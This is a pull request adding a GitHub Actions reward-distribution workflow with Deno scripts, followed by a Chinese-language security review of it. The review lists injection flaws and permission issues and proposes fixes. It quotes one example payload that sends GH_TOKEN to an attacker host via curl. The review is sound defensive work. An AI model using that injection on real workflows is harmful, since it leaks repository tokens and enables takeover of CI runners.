chore: add GitHub-reward form, scripts & actions

[TechQuery]

This pull request introduces a complete workflow for managing, distributing, and reporting rewards for completed issues, primarily through GitHub Actions, custom scripts, and templates. It includes new automation for reward assignment, tagging, distribution, and monthly statistics, as well as supporting scripts and type definitions.

Features

Reward Workflow Automation

• Added a new issue template (reward-task.yml) for creating reward-based tasks, capturing details like description, currency, amount, and payer.
• Introduced the claim-issue-reward.yml workflow to automatically distribute rewards when an issue is closed, extracting relevant data and invoking the reward-sharing script.
• Implemented the share-reward.ts script to determine eligible users (excluding bots), split the reward, tag the merge commit with reward data, and comment the reward distribution on the issue.
• Defined a Reward TypeScript interface to standardize reward data across scripts.

Reward Statistics and Reporting

• Added the statistic-member-reward.yml workflow to run monthly, checking for new reward data and generating a summary of rewards per user and currency.
• Created the count-reward.ts script to aggregate and summarize reward tags from the past month, group them by payee, and publish the statistics as a new tag and GitHub release.

Supporting Configuration

• Added a minimal deno.json configuration file for script execution.

[TechQuery]

@ifytek review 意见

Critical（必须修复才能合并）

1. Shell 命令注入 — claim-issue-reward.yml

deno --allow-all .github/scripts/share-reward.ts
${{ github.repository_owner }}
${{ github.event.repository.name }}
${{ github.event.issue.number }}
...
${{ steps.parse_issue.outputs.issueparser_amount }} # ← 未加引号

issueparser_amount 来自 issue 表单的自由文本输入，且未加引号。攻击者只需将 amount 填写为 0; curl
https://attacker.com?t=$GH_TOKEN 即可在 runner 上执行任意命令。

2. GraphQL 查询字符串注入 — share-reward.ts

const PR_DATA = await $`gh api graphql -f query='{
repository(owner: "${repositoryOwner}", name: "${repositoryName}") {
issue(number: ${issueNumber}) {

变量被直接插值进 GraphQL 查询字符串内部，而不是作为独立参数传递。zx 的 $ 模板只对独立参数做 shell
转义，对字符串内部的插值无效，存在 GraphQL 注入风险。

3. deno --allow-all 完全禁用沙箱

两个 workflow 都用了 --allow-all，Deno 的权限模型形同虚设。结合上面两个注入漏洞，攻击者一旦注入成功，拥有完全
的文件读写、网络访问和子进程执行权限。应改为 --allow-run --allow-net=api.github.com --allow-env。

---

Important（合并前应修复）

4. 第三方 Action 未锁定到 commit SHA

uses: actions/checkout@v6 # v6 根本不存在，行为不可预测
uses: denoland/setup-deno@v2
uses: stefanbuck/github-issue-parser@v3

任何一个 action 仓库被供应链攻击，恶意代码就会以 contents: write + issues: write 权限运行。应锁定到具体的
commit SHA。

5. 触发器对所有 issue 关闭都生效，没有 label 过滤

on:
issues:
types: [closed]

每次关闭任何 issue 都会触发，浪费 Actions 配额，也扩大了攻击面。应加上：
if: contains(github.event.issue.labels.*.name, 'reward')

6. GH_TOKEN 暴露在 workflow 级别的 env

env:
GH_TOKEN: ${{ github.token }}

这让所有 step（包括第三方 action）都能访问 token。应只在需要的 step 级别传入。

7. amount 字段在进入 shell 之前没有数字格式校验

表单用的是自由文本 input，没有 pattern 约束。应在 workflow 里加一步校验：
if ! [[ "$amount" =~ ^[0-9]+(.[0-9]+)?$ ]]; then exit 1; fi

---

Minor

• git push --no-verify 绕过了 pre-push hooks
• count-reward.ts 里 $(git rev-parse HEAD) 内嵌在模板字符串中，应先赋值给变量
• 没有 concurrency 保护，同一 issue 快速重复关闭可能产生重复 tag 和评论

---

结论

Critical 1 + 2 + 3 构成完整的攻击链：任何能创建 issue 的用户，填写恶意 amount 字段并关闭 issue，即可在 runner
上以 contents: write + issues: write 权限执行任意代码。这个 PR 不应在修复这三个问题之前合并。